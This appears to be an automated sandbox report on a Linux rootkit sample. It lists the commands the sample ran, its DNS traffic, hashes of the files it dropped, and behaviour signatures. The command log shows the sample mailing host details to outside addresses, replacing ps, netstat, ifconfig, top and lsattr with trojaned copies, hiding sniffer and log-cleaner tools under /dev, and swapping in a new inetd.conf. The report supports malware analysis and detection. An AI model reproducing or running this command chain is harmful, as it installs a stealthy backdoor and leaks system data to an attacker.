[mail -s roote [email protected]]
/bin/cat
[cat computer]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGZ-0000Bq-Hs]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGe-0000C3-BH]
/bin/rm
[rm -rf last lk.tgz computer lk.tar.gz]
/usr/bin/clear
[clear]
/bin/chown
[chown root.root bin boot dev etc home lib lost+found media mnt opt proc root run sbin srv sys tmp usr var]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGf-0000C6-0x]
/bin/rm
[rm -rf /sbin/ifconfig]
/bin/mv
[mv ifconfig /sbin/ifconfig]
/bin/rm
[rm -rf /bin/netstat]
/bin/mv
[mv netstat /bin/netstat]
/bin/rm
[rm -rf /bin/ps]
/bin/mv
[mv ps /bin/ps]
/bin/rm
[rm -rf /usr/bin/top]
/bin/mv
[mv top /usr/bin/top]
/bin/cp
[cp -f mkxfs /usr/sbin/]
/usr/bin/touch
[touch /dev/rpm]
/usr/bin/touch
[touch /dev/last]
/bin/mkdir
[mkdir -p /dev/ida/.drag-on]
/bin/mkdir
[mkdir -p /dev/ida/.. ]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]
/bin/rm
[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]
/usr/bin/touch
[touch /dev/ida/.drag-on/tcp.log]
/usr/bin/touch
[touch /dev/ida/.. /tcp.log]
/bin/cp
[cp -f inetd.conf /etc]
/bin/cp
[cp -f services /etc]
/usr/bin/killall
[killall -HUP inetd]
/bin/rm
[rm -rf /usr/bin/lsattr]
/bin/cp
[cp -f lsattr /usr/bin/]
/bin/chmod
[chmod 500 /usr/bin/lsattr]
/usr/bin/chattr
[chattr +i /usr/bin/lsattr]
/usr/bin/lsattr
[/usr/bin/lsattr]
/bin/sleep
[sleep 1]
/bin/uname
[uname -a]
/bin/hostname
[hostname -f]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep vendor_id]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep model]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep MHz]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/bin/df
[df -h]
/bin/cat
[cat computer]
/usr/bin/mail
[mail -s placinte [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGu-0000De-5L]
/usr/bin/mail
[mail -s roote [email protected]]
/bin/cat
[cat computer]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-armhf-20240611-en-5 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGu-0000De-5L]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGz-0000Dk-71]
/bin/rm
[rm -rf last lk.tgz computer lk.tar.gz]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jH0-0000Dm-5G]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-5 | udp |
Files
/dev/rpm
| MD5 | 4e6ac6c2a2fecfe1e88ed9ef72c2d2cd |
| SHA1 | 76015ef9244670de728b830ad330c536f42c4e39 |
| SHA256 | 625d8ffa241021399ea6cf2f8f6ceaa5b19bee660bed532ef6c7dbead906917c |
| SHA512 | 1c8c0e2a26bb9cbef13ececacda94d9e8403646eb120596540bf040e672338b5c21333f1172d1822b5c87419a35437ea111324c5b0e3196d35407acf74e544f7 |
/dev/rpm
| MD5 | 7d298531c8d0893706bf9c76a40f8386 |
| SHA1 | 36f5cc01e0b6bcac92aa01055f3eb1bf45bf36bf |
| SHA256 | 03d0ea06da1c004ba7e1ae10d04444e235a4b8cf8451d610f771c539d1387f1a |
| SHA512 | 38f915c4921b801fe5b560fd9be4bc92705ee1376812f377d15a41bf2424f7e7324ea6cc6e103acee23940a4a8c93f1829a2b20fd5c3c22bb5542ce17d2ad973 |
/dev/rpm
| MD5 | 1894a58fd103ccce773c667411597492 |
| SHA1 | 248701dcabbff132054e34fd86f9afbd3746ea38 |
| SHA256 | 0b3158157a0891176e648dca6743c6f62c2a0ea6c5ba7f33bc8740ae42513d12 |
| SHA512 | c3c622fcac2163a71132dc706cf26b4e87912ee9fb13b593708d6c71c8a72fcca1b34bc97e6cf6f732308ac30475b2f047e2a315162f7314c24ae65413561f9a |
/dev/rpm
| MD5 | 1d0177d6d6d055555eb272249d89f54d |
| SHA1 | 6137ecd54c6ca43dbe4bc63a030b817a94a2a5e3 |
| SHA256 | cab38856d96e2273d9ca9e8eec5c4428dea21d90fcc1005d23d43db7508b9c9e |
| SHA512 | fad8ef62c3c5316497524e6c0101ed3e57b09ec892f902849d771d682b90430a6b7a588e1e10f8c93f01feb9f5f702bf1bcd5b8be2e12dfbcdbfec2b024e22ab |
/dev/rpm
| MD5 | a56a4ee13c1681711fb6217ec17a8abc |
| SHA1 | 6193fa49399265b3efbc7ec47760a23749a278a3 |
| SHA256 | 610c4e3a32f6e1fb38d082ed6ed86b1c0fcc42314df0e6d8f5c7ea70afb6dba4 |
| SHA512 | 86d576cf220f3a37ced1348aad2d799c692a13206d1709537123a7726174481ab9cb1fcf9f5046b072ff657e4becb0ae7ee83b8d5e18ef317930fe8de2cc0ec0 |
/dev/last
| MD5 | 29b9e96e561662774c048aaf62f63f99 |
| SHA1 | 0765b1eaf2054c54fe82e1326617d919f5f200fc |
| SHA256 | 76025f97d8ea5be475bad1e9ba9579059ef456583b63a71fcef9bbe055e865ec |
| SHA512 | 1db52eabbd3250a830155d0ad8b486c4dbe5fbf043f9bd45b6cf8982cae4c974e4cfe862f74824e091905b79d8cde6a6c6c71541a782aaf9e917282612eb457a |
/dev/last
| MD5 | ed90c163bc4809cfba41afe945d8c3ac |
| SHA1 | 3fc77c1038907a6540022911bb9f74ab260ed576 |
| SHA256 | 1b70087ed15d011f96f1c7ee24133cdb96fa80e07d9086bac204f46663ad9954 |
| SHA512 | a2ad80478649090d1294be13b410e2434a170aa027d1e5329c30ea805b8d8c5c0e8f018cd8183c7bd2bfe7fd4ed0cd351c8ac8e78503f250cc352726a4442917 |
/dev/last
| MD5 | 81ef1d399417bc7c03d5454d426e0e30 |
| SHA1 | e830de7de2fedc8688ded4335b6be7f0dcc2cf13 |
| SHA256 | 6fff47dbd5fd120ab99a02baa33485f872f066beb802da8a594dabfcd43ae89b |
| SHA512 | 89551b76b13cecc8e295a11b0c9e7a334e2448202461a58f1dd14398a9f92d9b56089b285e3cfae9b950b88dc8f8aa48a812cef8bd1aa6696be51edb62adfbeb |
/dev/last
| MD5 | ea4abc4909616408ea03fca58e9daf78 |
| SHA1 | c368533d40cbcf2d43c2b0f493bced7496fedafd |
| SHA256 | 574eb71079a9afe0d64c42a205368f6df46e1de0c98d28e3ba145045dba86ced |
| SHA512 | 92a1b480592675ff260a8659c179e788e50fbc846562ac2dbe9f5f11fbfd8bb6b3d2574c9c51a2f08ea506e5b719d4ca528ae5a1a51dd6a930425462eee4ab75 |
/dev/last
| MD5 | a2e384cb9bf939430cc6d44800052952 |
| SHA1 | 3cafe08a106154033956aa6bbf2605e0ac94c290 |
| SHA256 | 89558b7545ed41e4938774fac4e78696d61eb06a6f20755a2aa056becf3f8532 |
| SHA512 | 61aae5e24e101efab9db03dd6118fc95252c39088310b1d1172738565a456bb11d9a5ad84df82b2346d0ba4aae10f798889fe566c4a44e48f3a376f279d72058 |
/tmp/computer
| MD5 | 8f068659378f40f410ceed05ce4eb4cd |
| SHA1 | b047415df69709692f73f1a85de1ae1b84121cf1 |
| SHA256 | a4476e2a3a0b88480559a574fba4d9801b71b7cd660c9cf8890b09aa451bd412 |
| SHA512 | 958bddb268e8032dc9d9c4d363e34a09cda739e29331411de32da80a659453a250bf3e9d9f39e6c2d756783aa2fdb73175c1ae3d3b0b17da7d8bf4e77d17d674 |
/tmp/computer
| MD5 | c8f7752120c4c6e14d5a8c17b5c99bf0 |
| SHA1 | 72bd784dfd52827a2914055be3e7c8c17da26464 |
| SHA256 | 69e58b15918ca3538691c7b9a5fc55373198220f69d75ff53bc9deedd533d62d |
| SHA512 | f7569aff3561511413e8c5c698f7c5a38c67d8e8d43623eef674018705dd36b0e236e19213fa6c69900f07dc8e0af60228f6d1ffbd88b7d66faa962e768b3317 |
/tmp/computer
| MD5 | 4c8df643ad00297d38b726b572126e16 |
| SHA1 | bec2be7631d7ad720dc20c0f39525b087e4f244f |
| SHA256 | ab30de705315654e3134589920d2587e6e9452bdcdbf770abaf2244d3a023e42 |
| SHA512 | b1f6c416f7163e6418da3368e94b31e1b287546ed149940b2ba6ad2beb50917c44ba57df0a80d1429980f568972b625e560522878cd0e9799e7a797b9e090692 |
/tmp/computer
| MD5 | 37f1db47fc37a093bb93d7120cebd52b |
| SHA1 | 9b7d07ba398b2f0eb0830a6b880973b4d40b3a6d |
| SHA256 | 99ceeaa2d1ec4c70766aa78f40bcd46f405872968652e692157e76e2c2c6abf0 |
| SHA512 | 65dcd832f724b14a6873e44ff05a62e140a7a2627966e2b3feeee7f71366bc0a3f6c15f29731326e1d861ef40057662505b7e80b71cc4bb115edc65268102ebf |
/tmp/computer
| MD5 | 8dce73ad81db253f60245f11366a6762 |
| SHA1 | 33da8b87ff4a81ca7668b5976f0ea2ead2545202 |
| SHA256 | b268c91adcefea8f2f115f8f6b88c1ce190cb21e30ec2c8ffd23b163385e7e31 |
| SHA512 | 5ff5a3f40890bb51f3b31a9f75c983d7d49b1b05418414eebbad9ba2ede078cdf0aad1a67c8daed9aeb838cdde36b95e3b2291c02d4da713e7eec3ba25f67dd3 |
/tmp/computer
| MD5 | beca71bf200edc891d6cb69d7b2ad1ba |
| SHA1 | e04133e19fcfe726f03334d83b2a9bd7a975dde3 |
| SHA256 | 086e6365276103262e726b90d8a2cedd03c0a78de639164f4595a54f56df43e6 |
| SHA512 | 0226fd1ce42c7587e8efcc86441b4e1325084e1485ec027051a39e654a9d4cddbeac777091bd2ea06d54aeaedf1cb9ee9d5956d897a6108dc6af9ed6206e5ca2 |
/var/spool/exim4/input/1t2jGZ-0000Bq-Hs-D
| MD5 | 04d6a3d969c2001a707229d25c1e5a54 |
| SHA1 | 2d305db37cb21fc4305988cc9cb1a007d1653dab |
| SHA256 | 6314b2af40496bd52b71f14088c338219a7eee7e71e19b6f3a70a827058079e5 |
| SHA512 | 6e903a8c9f684fbdbc6fc52ec37d52390b41dbc828ef268e56a22c20d87976474a421e43d5f48decfdfbbe9e5015a60473684732cf5c0d701a956019427aee14 |
/var/spool/exim4/input/hdr.734
| MD5 | 642d2ca083b30aabfb924228669826ba |
| SHA1 | 62332316777d867f7055f9ede36accaa41e6c376 |
| SHA256 | d5198dcdd66ef29a462d7a0ca23f482fc694892f115ae0c2a895113aba457f38 |
| SHA512 | 699594f61bbb81a068cc418f7ad6057b0b2d658ad035a7a5ff8e43e54d60b56d9e4b380a97261f8265c3b188468ffac444c511cfecbacdd8821abd7c4fb31b0b |
/var/spool/exim4/msglog/1t2jGZ-0000Bq-Hs
| MD5 | 0a67dba8634383d9a020657165ed6246 |
| SHA1 | dc1d544d98ce18ea2d791575f49fbaefac7ce601 |
| SHA256 | 42dba61c335e888563772fe41833d1f958ee1fe1ee9897ae3c44099dd06b9247 |
| SHA512 | 4b5e12ebe57d11d2114dd8b3f168a70c1c1e644fd9ff8a8c4279672f5e401fb49bddeb6103080e62c7c14b417caedc1c01877cbab7a5dbc31b2f65c92b5ffd9d |
/var/spool/exim4/msglog/1t2jGZ-0000Bq-Hs
| MD5 | 5adf3799176832807650590ead2e4faa |
| SHA1 | 286239e8e277fdaad8ef33625bf216c92b4964f8 |
| SHA256 | a3a9d425fa78a1cb6dfc6cc4a9fd444fa74d80d02e2791b7b582216bd941c829 |
| SHA512 | 3ceaa4369ecb09c02803d6808934b5eefa98b92e9001d91d8d3591979a6b87fc69872cb7904e05c21cd4b7730c0ff05c4621cbbacb427637cb544c0cf92bad3a |
/var/spool/exim4/input/1t2jGe-0000C3-BH-D
| MD5 | 5d86fc62d58aac35ec2adb902c721c8d |
| SHA1 | 6fc280225884d40c2af5942517831e6a86bfdc5d |
| SHA256 | cc33f7dbd9a5e42f823e4a0893de55f038d32ed78f8cb8fdd53c2af4f4f1ed48 |
| SHA512 | b4d408635489f3237fd47816a3444efaaed578729f8ec2e063513d6bf6e9b8a3319c55187c762e347ee9a21f641eba9ffccd3e673829fdc77e4fc8ab25f7b5b6 |
/var/spool/exim4/input/hdr.747
| MD5 | c8e99586637333b21d4397542e3d8d70 |
| SHA1 | 45b797b654842514e6b08efa9c35b3d5a0af9c87 |
| SHA256 | 22426f31739622ccf91c09382d510c217bfac0773e3c24520a370ec706d42e94 |
| SHA512 | 5c4fda1f146d49ac930d8ebf6e44b808ca402a09e8238850b92c14779c1c6add580be72fca3ee025e9e9d9e2becc8b949211696bed143b4a0395c6f2de224518 |
/var/spool/exim4/msglog/1t2jGe-0000C3-BH
| MD5 | 4171ae09d7a80a45afa3fecbcb74216c |
| SHA1 | 7a87f95d19dba8e01a2dca4b59d7b7b234dde834 |
| SHA256 | e47c7972cb11225609e79e9c02adaf39a62bb9fe10963b9f79be1c92660e98ae |
| SHA512 | 322f0cbd16c7830cd8201bb82cc1af320e839a0b0478f8d1d49015d745976b626127fce176e658e6a7e64fd4392deae918705b3f342c8812160a9c5133963fec |
/var/spool/exim4/input/1t2jGf-0000C6-0x-D
| MD5 | 74010548ac93e5ce693a5ee89f6f7442 |
| SHA1 | 1df747c757009cbacb7950f14cd1344f0994a025 |
| SHA256 | 99737a5db171c52c310195796ca986ba5ba037846d66593d897e14f8e32bfbde |
| SHA512 | 97dc9f3ee2b7828f588dd7b0c70b01b794ce3af666055a47b6979c9e83cec46c6a487ef3a5a89b9b386b1c6e1ed35c84902633ae9d0b11b90508c3f86e5e8ecc |
/var/spool/exim4/input/hdr.750
| MD5 | b36396191962c8ff98f4e3a65f2cc184 |
| SHA1 | 311e4a388603c07f329980ca8214cc41eecc4a4c |
| SHA256 | b032df5783bc42a422784edd109adda718b4b9ae0e95aaa1764980eefd0170e3 |
| SHA512 | a30eb5fff9792e57a2a268ece286310bc91f53fd884be2015d1b8500e0dc57c82eb6359e51c316528c3d27bef4c3be888053ae329c01153daa61b2b561306d47 |
/var/spool/exim4/msglog/1t2jGf-0000C6-0x
| MD5 | 7eb525b2f5925e500f263d63a8c4d888 |
| SHA1 | e8eaa45d9264e72bfa8e902e392a411cc557ffa2 |
| SHA256 | 7bd1330bc0087bd0e8f70d188166a3dd50af85f0fbff402eaa9ab0a7fe299930 |
| SHA512 | fb6b263679995f2ac3a5753bdbd689aa22cc569515f34d02599a0da9c51adc8bb2ba4cb4a9e933ca2ca031a46062884e2ea1b4b68f8ef5c7962810db44d823fc |
/var/spool/exim4/input/hdr.741
| MD5 | b4bb07d4ab5cf2daff59efbbbf74d411 |
| SHA1 | 25c73b1bc6f009adfe1cd0261cb9bd53804813e2 |
| SHA256 | b9b32bbb2140ec3304a8edb22c6f136742d59e2c7840835e6ca67fb60c407c93 |
| SHA512 | 88464b566f336e558f1b64d4b694a417964d89f9145a7119250ba971dbf04a4d7ea071d7bdcd22b2c34b664bacfc6ac6c93cdcc61556272750141f62643575bf |
/var/spool/exim4/msglog/1t2jGe-0000C3-BH
| MD5 | 84c1d9e4069f06a09380cbb157bdb091 |
| SHA1 | d9492f2e9d041c8587e209c67eebbada9e6fa81a |
| SHA256 | 81ec2a26956e8893c29c62a6c46fa9698668bb43a83e2f442d9b50b2ea2c5357 |
| SHA512 | 2e9fa162e8483e431eb73476a8ac68414693d4377a7d337e911659d819b01818c0dda9b9274948c19e88e3a61edb1d69c7d75846ee143ec7d36963b24ff715f8 |
/var/mail/user
| MD5 | 381d9647046c21f355a5eff683bf91b0 |
| SHA1 | bdc7d162fb546dcee8c515826adcbf7ef059d30e |
| SHA256 | 82d239c94ec78cb6146c8c5d0f8940c3348c16652727161de3378f97a3600add |
| SHA512 | fa8000453102ff4a9415b7adf6940994f3cb029abf3350e0b36cddd18cb70781b341851d2c28b3afb8d7ed49b283df020866f9d7a58d05edcc731b3baf6d2395 |
/var/spool/exim4/input/1t2jGf-0000C6-0x-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1t2jGf-0000C6-0x
| MD5 | 693b33a41b3ccd965c73506fcc6b9d50 |
| SHA1 | 2a7a7c9b9ddd3fa87e2c54c23a84eea092dcff88 |
| SHA256 | e72b0287606a8c19d81e32bb2bb93aba8848fae4a51b5c0ace29d256109288cb |
| SHA512 | 416c0ea18ed91ddefe9c360a721ba289c8e4e558ccc3e0b5e4c467760470774925e5e6262f1636d4582864bc7c210e832eb83fe3cbf2058821e6a0d4a3407669 |
/computer
| MD5 | bc55489b7eef4f411a35f4ae10aa68ea |
| SHA1 | cda58593c6342db85e49e37a37fed8682765e292 |
| SHA256 | 5e79826c4725a7171fe669842f570965d1601b0517bc8c2c946b731214eff722 |
| SHA512 | 480a5cfb21c6f0e0efb57fc24fb4c71837c1a8af4b74cc65cf5d4adb0d6110dbd6fddc2528736f05976eb4fa80947efe5e7c92d055a0fc6c5fd0e4b14669972c |
/computer
| MD5 | 5228b507c439b311ec17f1f7cecb2cbc |
| SHA1 | d1421f7f58b029aa62e84a177773e92a438b793e |
| SHA256 | fe6f264bda476516279fba819fed1ba52e3d09e4a96c17ca8b3a4fbfdc2f72d9 |
| SHA512 | 1e2daa285a65b4deba7059116ebc90c63a25060dfed2c8f209c079498cc6cbb61b49f2dcf52545ba6e24698cf1fc55f9b5758c571c03ffda08d86417d20b795e |
/computer
| MD5 | 6fa7e032dde2f249236a37d4430090eb |
| SHA1 | 88ac99ae05862194050801b3cd5fafe81dee3c60 |
| SHA256 | 8352c21d38716b6bd5ee449b415d798aaf3c6886fb8d6874f8b3e7b45a3a922d |
| SHA512 | a902ed6f6b36070b64b5966e8d9d8e4fbae781572ee097abf7940d1dc69461b6d0d5e51fe92073400ea221e9e988a096d324c2ee387f22b2189f0ca01d4887ed |
/var/spool/exim4/input/1t2jGu-0000De-5L-D
| MD5 | 19032970fffe0262da69360d2d7d5377 |
| SHA1 | d5571509329c702579570844e910f7d4f4d6c684 |
| SHA256 | 316ce7b0d72254a078d7aa2ec156cead0c9ce4e7178837b3fca3dc03b46d4086 |
| SHA512 | d57b280c789b1bdaf28550d65b1a66c1fa1504cfc645b35a92ff09dc50f5f5c1b9e548c8233b5996e428b909ff41732279136db8a37d401d5ac452ad9085b734 |
/var/spool/exim4/input/hdr.846
| MD5 | 12a853cf58c142d32b635e3837f9b74b |
| SHA1 | c2f578ff5a94316447ea8c24aab31e0f00d4fb48 |
| SHA256 | b16dab7991ccd06f3f9ba404b6bb03f15beafe9fb8702a28e48c8456c3d8cb58 |
| SHA512 | d690bc8f8fd8c7e9333036350e6ef9019749363840992143dbaa4a5652d23d8def4f65ff1ec2c9e64b7c6dfd67c04e05afe95c8cd46f4f2c29a22f1d26a6122a |
/var/spool/exim4/msglog/1t2jGu-0000De-5L
| MD5 | 68ca470c63cf8030f236682b58c3168c |
| SHA1 | 57911934483281828c0adb6e8b1381bda058a905 |
| SHA256 | 7fc1e8c40a0e8d0231367863360c5fc36be4d920a5220441f41aca306b411789 |
| SHA512 | 8bdba3e2165a46ea4eb43fd670dbc53cb55311dd6732b7da6bda9fcb133d1bbdd0391afaacc5a8e794778458819088894de1a31f582370204dedcc7e94a52452 |
/var/spool/exim4/msglog/1t2jGu-0000De-5L
| MD5 | dc11bf0ca544f2e6ff3479fe2de147b9 |
| SHA1 | e966f069c2dd36df32c475e243ffcdff8c120e3f |
| SHA256 | 33e96c5a23e5dc5c79cd8c316334120817ffb05dec33665cbcb6819c2ef11017 |
| SHA512 | ad72737bdfc36b89bbd73dec8e499cc13c9a088eee7250e9189bc7c9be47252bf7a478e14967e4fc95b4cef2ddbca5a7b41381e778b6481eda862a8a30724302 |
/var/spool/exim4/input/1t2jGz-0000Dk-71-D
| MD5 | dec5999fe0df6e0110c9df7cec156ded |
| SHA1 | 9d9e0ed1d530c7557053ff278c28e558a50fde13 |
| SHA256 | 72932bab21f122d4ce2054963bde7f28e158e24056476e5a18f84fe5094dd916 |
| SHA512 | e7b32482e91b7876ab537c8e32cddab37446e0ef651748036a025bd97d6f31d2ee26edc290c78e4ca66ef371f3e28acf46d989f02011efda0c490a7e34c3c6eb |
/var/spool/exim4/input/hdr.852
| MD5 | da37c36be403556e761595d8c9a3df04 |
| SHA1 | 1da8551464ca0488b1b5dff6b1f21ae0062204b1 |
| SHA256 | 6d2e65d70362df6f0424c7d4f6aaabb491fd6a6693eb4876b134f52dc8d2ddf5 |
| SHA512 | 1f561ead8b3cb392d075ff1678c11959a40f35931fd1d458235c95612ca0d381f04c78ff1d02895529ddfa0c801a0c3d80dbf2594dbb1161ba119448ab164982 |
/var/spool/exim4/msglog/1t2jGz-0000Dk-71
| MD5 | a08934f7c07a2ef72232d6756ca06135 |
| SHA1 | c1e9ca1f37cbcd79f3877907e1d24a8eb3050a23 |
| SHA256 | 3bd452fe1ec879169029f53aacb690d561cdff982475ee802d11062c257cf553 |
| SHA512 | 67323eb561eb75f460c7e6b1597ec5a3fd3f50fa3c988e2fd22abe3187764998b08bca9a7c427c9c12ff640952b1f806d62615b5f5c2714347cd17de0d2eb92c |
/var/spool/exim4/input/1t2jH0-0000Dm-5G-D
| MD5 | 383c941049bed7e39c6cbffacfdf8957 |
| SHA1 | 8213fd53acceb217387e5fee336cc610ff2d62c8 |
| SHA256 | b595e24f2ca55be513f3c2b4e7bcd2016584b09106dacffacb866c3293dfb07a |
| SHA512 | a049abb4ebacd027b871f2f2c87cf920ec5a9cac7fe3cb64235826cdc62f733fd2b5a04276a1973a545596d350a3e3e384b835a50ee0c2e3ed54fb64f3f0f2fc |
/var/spool/exim4/input/hdr.854
| MD5 | e6fb2e4d8b461caf8f84e03a53f68394 |
| SHA1 | 6f2fed334e67a2e1776b84d92be98aaefca67a1b |
| SHA256 | 965d898f32cd1dd5fd5a64f5b67b73c52e0414b148e35d0154cf5f630643f2d4 |
| SHA512 | 53c7bbbbc9a44d376822323be5a588f995e144ce8dd00e437318aab8540e65f993155b862e348c8a37e7827290a429b342f335e726257a28ab1a9f7f985a3dcc |
/var/spool/exim4/msglog/1t2jH0-0000Dm-5G
| MD5 | d823cafece34e05003dc46bb58ac5b80 |
| SHA1 | 943f0f894a736c34b21facfa5072dd5643144a4a |
| SHA256 | 845605bda62cf128e7923d1ae278371e96572e4033233683a89aa1ab2096dcf3 |
| SHA512 | a9f2bd4701791d39b5f010f624c3ec13771422edeee0c90117a29d8cdedf86554f3f9096a8497409a29b68aa76ce867415a878c5004bb96e78e153ed9e9ef603 |
/var/spool/exim4/input/hdr.849
| MD5 | e959e5d39dc1cb1fff10790475c4f8bf |
| SHA1 | 31577f3e57125345537b71b864c73d5a9527af5f |
| SHA256 | 07a2fc31212b6f991c32aec7a56b0b690ab7a8e2015c45d64c4391a07e14dbc5 |
| SHA512 | 0b05152c0a6ba45a9738ad1dfa69fc597cac07518043706e5e7b9ee046ab16ad0d15c5945d7502acb9ec0bfa3b993c2c79669c985bca08f1b4bdc8aa88f1f0a1 |
/var/spool/exim4/msglog/1t2jGz-0000Dk-71
| MD5 | 07fadc2d200cb2874d581e4a100555f3 |
| SHA1 | 6756a02aa6d6645a8013f9d9e0f1dfe1c99f6a30 |
| SHA256 | a75f889d709804189d8ee2ecfb34a4368171c19caa15a53ffe6d257d8729221e |
| SHA512 | 45ce30344bc8040ecdf0ee0b546e73ef4f494466cb1d77b3b39bf04177d1b990888232597571fb1516deddbb0ae8d8eb2c938db7f9316c26b4ddc8a33a45e49b |
/var/mail/user
| MD5 | db4873366da252523c084eafceb7cc26 |
| SHA1 | 02934de39f3704014c4567ec140ab032d9f5ca97 |
| SHA256 | 7c6df4a77640bcd68644dc88e9803d9fb624249a7f1e763f80f5621842d68fab |
| SHA512 | a6a5c511ea21465dc32c136a84e10294dd19e144f9daa5c3786d99ae85f48601e3a0ce246aa2ffb419a827ba40b8abea4a3ce462df232ed3f9912d59a3a1e097 |
/var/spool/exim4/msglog/1t2jH0-0000Dm-5G
| MD5 | 4e316fae543f4b051d53d645873c27bc |
| SHA1 | 677b9dfee1f769816fb960546485415118105d2a |
| SHA256 | 907e5d5d4c190f40b67ef1451310b86c26f671ca571c7d45bbbbb3ee212b3fcd |
| SHA512 | cf18a02fa5028746a94ce9f2065f08f4951c4bc2a18fbc5dbc1cc2e06bed09f780720546399072704686cb0444ec04b9fe4d5cfcfe8db7292434c1599bcfddbb |
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-21 05:39
Reported
2024-10-21 05:41
Platform
debian9-mipsbe-20240729-en
Max time kernel
30s
Max time network
32s
Command Line
Signatures
Enumerates running processes
Virtualization/Sandbox Evasion: Time Based Evasion
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/uptime | N/A |
| N/A | N/A | /usr/bin/uptime | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/uptime | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/82/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/123/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/672/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/704/stat | /usr/bin/killall | N/A |
